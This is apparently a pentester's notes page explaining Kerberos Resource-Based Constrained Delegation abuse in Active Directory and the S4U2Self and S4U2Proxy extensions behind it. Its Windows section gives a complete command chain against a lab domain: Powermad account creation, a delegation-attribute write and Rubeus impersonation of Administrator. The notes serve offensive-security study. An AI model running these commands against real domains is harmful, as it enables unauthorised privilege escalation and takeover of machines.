RBCD

ABOUT

RBCD is a Windows Active Directory mechanism where a computer object specifies which accounts are allowed to impersonate users to it, for constrained (limited) network-based delegation using Kerberos.

Attackers exploit it by inserting themselves into that trust list and impersonating any user.

"Resource-Based" means the permission is set on the target machine, not on the impersonating account.

"Constrained" means the impersonation is limited to specific services, like SMB or LDAP, not all services.

"Delegation" means one account can act as another user across the network, not just locally.

RBCD allows a computer or service account to say, "this other account is allowed to act as any user when connecting to me." Attackers abuse it by creating their own computer account, then writing their own SID into the delegation attribute on a target machine. After that, they can impersonate any domain user, like Administrator, to that target.

So basically it is crippled version of full impersonation, which is good, considering rule of least privilege.

Example of Implementation

A user logs into a web application using a standard web form. The web server needs to query a backend SQL database as that user, but does not have the user's password.

S4U2Self allows the web server to forge a Kerberos ticket for the user to itself.

S4U2Proxy allows the web server to exchange that forged self-ticket for a valid service ticket to the SQL database.

S4U2Self + S4U2Proxy

S4U2Self and S4U2Proxy are Kerberos protocol extensions, not standalone attack techniques.

They were designed by Microsoft as part of Service-for-User (S4U) functionality to support constrained delegation. Their purpose is to let services act on behalf of users under strict control.

S4U2Self = "Service For User To Self"

Lets a service request a ticket for any user to itself, without needing the user's password.

"Give me SERVICE ticket FOR other USER so I can use it TO mySELF"

S4U2Proxy = "Service For User To Proxy"

Lets the service use that ticket to request a second ticket to another service, completing delegation.

"Take this SERVICE Ticket from this USER I just got, and let me TO PROXY this user's access to that other service"

REQUIREMENTS

Element

Value

Domain User

Administrator@militech.local

Fake Machine Account

FAKE01$

Fake Machine Password

123456

Fake Machine SID

To be retrieved during attack

Target Machine

WS01

Target Admin

Administrator

Domain Controller

DC01

Delegation Permission

Write access to WS01 RBCD attribute

FLOW

Create a fake machine account (FAKE01$), if MachineAccountQuota allows it.
Add FAKE01$ SID to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the target machine WS01, granting delegation rights.
Authenticate as FAKE01$ and request a Kerberos ticket as Administrator to FAKE01 (S4U2Self).
Use that ticket to request a second ticket as Administrator to WS01 (S4U2Proxy).
Receive a valid service ticket for Administrator to WS01 and use it to access WS01 as Administrator, achieving privilege escalation.

It's not necessary to create a fake account, sometimes it's better to give some machine account we have access to a delegation rights, or don't if we already have access to. The possibilities are vast, the only thing you need to undertand is components we need for attack.

WINDOWS

1. Creating Machine Object

For this we need PowerMAD script [LINK]

PS C:\> New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Checking Object + Taking it's SID

PS C:\> Get-DomainComputer fake01

2. Creating Security Descriptor for FAKE01

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2552734371-813931464-1050690807-1154)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

3. Adding Descriptor bytes into WS01 (Service Machine)

Get-DomainComputer ws01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

Checking Descriptor

PS C:\> (New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0).DiscretionaryAcl

4. Generating RC4 Hash for FAKE01

.\Rubeus.exe hash /password:123456 /user:FAKE01$ /domain:militech.local

5. Impersonating

.\Rubeus.exe s4u /user:fake01$ /rc4:3SAOIDFHOQWEB1O82G3O123KBSND /impersonateuser:Administrator /msdsspn:cifs/ws01.militech.local /ptt

Base64 Ticket to Ccache ticket

base64 -d ticket_bash64.txt > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=/home/v17/tickets/ticket.ccache
klist

RESOURCES

Kerberos Resource-based Constrained Delegation: Computer Object Takeover | Red Team Noteswww.ired.team

PreviousPass The Ticket NextnoPAC

Last updated 15 days ago

hashtagABOUT

hashtagExample of Implementation

hashtagS4U2Self + S4U2Proxy

hashtagS4U2Self = "Service For User To Self"

hashtagS4U2Proxy = "Service For User To Proxy"

hashtagREQUIREMENTS

hashtagFLOW

hashtagWINDOWS

hashtag1. Creating Machine Object

hashtagChecking Object + Taking it's SID

hashtag2. Creating Security Descriptor for FAKE01

hashtag3. Adding Descriptor bytes into WS01 (Service Machine)

hashtagChecking Descriptor

hashtag4. Generating RC4 Hash for FAKE01

hashtag5. Impersonating

hashtagBase64 Ticket to Ccache ticket

hashtagRESOURCES